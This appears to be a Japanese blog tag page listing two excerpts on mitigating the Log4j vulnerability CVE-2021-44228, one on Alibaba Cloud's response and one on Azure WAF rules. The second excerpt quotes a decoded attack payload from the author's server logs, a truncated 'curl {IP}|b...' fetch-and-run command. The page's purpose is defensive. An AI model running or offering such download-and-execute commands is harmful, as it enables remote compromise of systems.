log4j

2021/12/13

Alibaba Cloud でのLog4jの脆弱性（CVE-2021-44228）の対応について

はじめに Log4jの脆弱性（CVE-2021-44228）が大きな影響を生んでいます。元々はAlibaba Cloud セキュリティチームが脆弱性をApacheに報告したことにより始まっています。詳しい話は下記に書いてあります（中国語）そこで、Alibaba Cloud ではどのような対応を取るのか確認していきたいと思います。対策 Alibaba Cloud が公表している情報から Log4Jを2.15.0へアップグレード影響の受けるアプリ、コンポーネントのアップグレード JDKのアップグレー ...

2021/12/16

Azure WAFでlog4jの脆弱性（CVE-2021-44228）対策をしてみる。

はじめに Azure でのlog4jの脆弱性（CVE-2021-44228）の対策のひとつです。アップデートするのが良いと思いますが一時しのぎということで Azure WAFでカスタムルールマネージドルールを設定して脆弱性の対策を行います。（2021/12/16更新）ここではAzure WAFなどサービスの利用方法については記述しません。セキュリティの専門家ではないのでご了承ください。今回サーバーのログに残っていたものです。一部IPなど修正しています。 Base64の中はcurl {IP}|b ...